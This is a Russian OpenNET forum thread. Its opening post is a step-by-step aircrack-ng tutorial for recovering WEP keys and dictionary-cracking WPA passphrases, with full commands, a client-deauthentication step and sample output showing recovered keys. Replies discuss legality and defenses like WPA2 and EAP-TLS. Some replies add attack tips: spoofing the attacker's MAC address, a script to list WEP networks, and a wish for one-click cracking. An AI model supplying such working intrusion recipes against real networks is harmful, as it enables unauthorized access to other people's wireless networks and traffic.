The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Раздел полезных советов: Перехват WEP и WPA ключей в беспров..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Раздел полезных советов: Перехват WEP и WPA ключей в беспров..."  +/
Сообщение от auto_tips (ok) on 11-Сен-10, 13:28 
Инструкция по подбору ключей шифрования в беспроводных сетях, базирующихся на механизме WEP, являющемся устаревшим, но продолжающем широко использоваться.

Устанавливаем пакет [[http://aircrack-ng.org AIR Crack]].
В Debian/Ubuntu:

   $ sudo apt-get install aircrack-ng

В Fedora/CentOS/RHEL:

   $ sudo yum -y install aircrack-ng

Определяем сетевой интерфейс, привязанный к беспроводной карте:
2. Identify wireless network interface

   $ /sbin/iwconfig

   wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm

Активируем режим мониторинга:

   $ sudo airmon-ng start wlan0

   Interface       Chipset         Driver
   wlan0                   rtl8180 - [phy0]
   (monitor mode enabled on mon0)

Определяем BSSID-идентификатор сети:

   $ sudo airodump-ng wlan0

   BASE:
   BSSID : 00:0F:B5:FD:FB:C2
   Channel: 6
   STATION:
   MAC: 00:13:04:30:FA:EC

Для успешного проведения атаки к точке доступа должна быть подключена хотя бы одна активная машина, чем больше трафик у которой, тем быстрее будет подобран ключ.

Включаем режим снифинга и накапливаем статистику. Чем длиннее WEP-ключ тем больше пакетов необходимо перехватить (64-битный ключ требует накопления примерно 6000 пакетов):

   $ sudo airodump-ng -c 6 --bssid 00:0F:B5:FD:FB:C2 -w data-capture wlan0

где, "-c 6" - номер канала беспроводной точки доступа (см. вывод airodump-ng wlan0). В опции --bssid указан идентификатор точки доступа, для отсеивания лишнего трафика. Все перехваченные пакеты будут сохранены в файле data-capture-01.cap.

После накопления достаточного объема статистики подбираем WEP-ключ (выполняем операцию не прерывая процесс снифинга, так как числа перехваченных пакетов может не хватить):

   $ sudo aircrack-ng -z data-capture-01.cap

   Opening data-capture-01.cap
   Read 450 packets.

   #  BSSID              ESSID                     Encryption
   1  00:11:95:35:FD:12  test1                WEP (210 IVs)
   2  00:17:3F:62:2E:50  test2                None (0.0.0.0)

    Index number of target network ? 1

   [00:00:21] Tested 485 keys (got 17690 IVs)

   KB    depth   byte(vote)
    0    9/ 13   00(20993) 06(20737) 27(20736) 3F(20736) A2(20736)
    1    0/  1   F3(28417) A8(23298) 34(21248) 57(21248) A3(21248)
    2    0/  2   8E(25857) BC(23809) 3F(23040) D2(22784) 69(21504)
    3    0/  5   6E(24321) 35(2259) 5A(22016) 95(22016) B8(22016)
    4    3/  4   98(21505) 7C(20993) 84(20992) E0(20992) F0(20992)

   KEY FOUND! [ 1F:F3:6E:6A:98 ]
   Decrypted correctly: 100%

На выходе получили искомый ключ "1F:F3:6E:6A:98".


++ Подбор простого словарного pre-shared WPA-ключа.

Похожим образом осуществляется подбор WPA-ключа, только для успешного завершения подбора требуется значительно больше времени и определенное везение.

После запуска  airodump-ng дожидаемся соединения клиента к сети:

   CH  6 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
   ...
    BSSID              STATION            PWR  Lost  Packets  Probes                                            
    00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116  

После чего инициируем деаутентификацию клиента:

   $ sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

   11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

где, 1 - число отправленных deauth-пакетов, 00:14:6C:7E:40:80 - MAC точки доступа, 00:0F:B5:FD:FB:C2  - MAC клиента.

Запускаем процесс подбора ключевой фразы по словарю password.lst.

   $ aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 data-capture-01.cap

В случае успеха получаем примерно следующее:

   BSSID              ESSID                     Encryption
    1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)
  
   Choosing first network as target.
   ...
   [00:00:00] 2 keys tested (37.20 k/s)
   KEY FOUND! [ 12345678 ]

   Master Key     : CD 69 ...
   Transcient Key : 06 F8 ...
   EAPOL HMAC     : 4E 27 ...


URL: http://www.linuxconfig.org/how-to-crack-a-wireless-wep-key-u... http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Обсуждается: http://www.opennet.ru/tips/info/2424.shtml

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от pavel_simple (ok) on 11-Сен-10, 13:28 
ребята я конечно всё понимаю -- но подобные мануалы, в который в самом начале не сказано что "данная информация предназначена _только_ для ознакомления и может быть использованна _исключительно_ в целях проверки собственной сетевой инфраструктуры" могут быть истолкованы в рамках вполне конкретной статьи УК РФ. !!!WARNING!!!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от mega4el email(ok) on 11-Сен-10, 14:53 
Может кто подскажет как попроще сделать загрузочную флешку с подобными инструментами на борту?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от aaa (??) on 11-Сен-10, 17:56 
http://www.aircrack-ng.org/doku.php?id=slitaz
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

5. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от аноним on 11-Сен-10, 23:17 
Мануалы по взлому вай-файя плодятся уже 10 лет подряд. Вековой баян. Называется, "для тех, кто без гугла" или "самым одаренным от самых одаренных ".
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

6. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от QuAzI (ok) on 12-Сен-10, 09:48 
А методы защиты слабо написать?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

7. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от анонимус (??) on 12-Сен-10, 12:30 
использовать WPA2
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

11. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от daevy (ok) on 13-Сен-10, 10:20 
не панацея.
нужны radius, kerberos.
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

14. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от _Bulgarin (ok) on 13-Сен-10, 21:23 
угу, и сисадмина застрелить сразу...
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

28. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от kde (??) on 24-Сен-10, 17:33 
нафига??? EAP-TLS с привязкой к мак адресу.
и нач. отдела кадров на выдачу ключей :-D
их стреляй скокавлезет
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

15. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от pavlinux (ok) on 13-Сен-10, 23:58 
WPA2
PSK = "4My$uPpErP@$$\/\/0rD|"
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

8. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от xa2rd email on 12-Сен-10, 14:06 
Странно видеть подобную статью на опеннете. Про этот метод только очень ленивые не писали.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

9. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от Deam (ok) on 12-Сен-10, 16:51 
Прочитал заголовок, думал, что что-то новое. А оказалось всё старое. N900 WEP как орешки раскалывает.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

12. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +1 +/
Сообщение от netc email(ok) on 13-Сен-10, 12:08 
я конечно дико извиняюсь, но ИМХО статьи на opennet - не хватало, по причине того что на opennet - очень приятно читать и скать любую информацию, да не смотря на то что есть google - opennet - это не только статья как таковая а еще и полезные комментарии.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

13. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от Meddina (ok) on 13-Сен-10, 14:18 
Поддерживаю! порой комментарии бывают содержательней, чем сама статья!
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

16. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от Харон on 14-Сен-10, 13:23 
ИМХО, немешает добавить пункт со сменой МАК-адреса атакующей карточки перед началом атаки ;)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

18. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от Nas_tradamus email(ok) on 16-Сен-10, 18:16 
Cкажите, в статье есть строки:

"Определяем BSSID-идентификатор сети:
   $ sudo airodump-ng wlan0"

Как автор узнал, что в сети "00:0F:B5:FD:FB:C2", которую он нашел, используется WEP?

Вопрос: как быстро найти WEP-сети без использования kismet каким-нибудь скриптом?
Дело в том, что на N900 дико неудобно юзать Kismet из консоли.

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

19. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +1 +/
Сообщение от artickl on 17-Сен-10, 18:57 
я использую простой скрипт

iwlist wlan0 scanning | grep -e ESSID -e Encryption -e WPA -e Channel -e Address | grep -v Frequency | sed 's/Address:/net/' | sed 's/Cell [0-9]* -//' | sed 's/^.*Channel://' | sed 's/^.*Encryption key:/enc-/' | sed 's/^.*ESSID://' | sed 's/^.*IE: //' | tr '\n' '|' | sed 's/           /\t/g' | tr '\t' '\n' | grep -v WPA

который выдает все открытые сетки вокруг + WEP сетки. Для меня очень удобно - не всегда есть возможность графику включить - например на wrt54 )))

Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

20. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от artickl on 17-Сен-10, 19:00 
ну или просто

wlist wlan0 scan

и ручками просмотреть где стоит "Encryption on" но после этого ничего про WPA или WPA2 не сказано - значит WEP


Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

21. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от Nas_tradamus email(ok) on 17-Сен-10, 20:42 
>ну или просто
>
>wlist wlan0 scan
>
>и ручками просмотреть где стоит "Encryption on" но после этого ничего про
>WPA или WPA2 не сказано - значит WEP

Спасибо! Не знал про wlist.

Надо бы написать для Maemo скриптец для взлома сети одним кликом. )

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

22. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от Вася Пупкин on 18-Сен-10, 00:27 
капец, ломатели, неужели кто-то еще юзает WPA и WEP.
Либо просто открытая сетка, либо WPA2 и все эти древние мануалы идут лесом.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

29. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от zazik (ok) on 05-Окт-10, 10:50 
Используют. Некоторые мобильные устройства WPA2 не понимают, только WPA.
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

23. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от linux_must_die (ok) on 18-Сен-10, 04:43 
да запросто: dir-300 по дефолту стоит WPA/WEP или вообще без шифрования. и так почти везде
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

24. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от Аноним (??) on 19-Сен-10, 11:57 
Да и брутфорс по словарю актуален действительно только при пароле вроде "12345678"... Но кто такой установит :)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

25. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от Nas_tradamus email(ok) on 19-Сен-10, 14:35 
В статье не сказано, что нужно ловить "#Data" пакеты, а не простые. Во вторых, не сказано как нагонять эти пакеты (рукопожатие и т. д.) обеими способами.

Я долго не мог понять почему у меня aircrack-ng пишет "Got no data packets from target network!". Эта статья сбила меня. :)

В общем, ловить data-пакеты WEP можно очень долго и нудно. Я вот за час не поймал ни одного пакета, хотя вокруг меня 4 WEP-точки.

Может дело в N900... не знаю.

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

31. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от Аноним (??) on 25-Окт-13, 18:53 
я установил =)
Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

27. " "  +/
Сообщение от Аноним (??) on 21-Сен-10, 16:16 
странно, но aurodump-ng выдаёт сверху следующее: [fixed channel mode -1] как то так. что бы это могла значить?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

30. "Перехват WEP и WPA ключей в беспроводной сети при помощи AIR..."  +/
Сообщение от leo email(??) on 20-Дек-10, 21:31 
новичок
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Спонсоры:
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2020 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру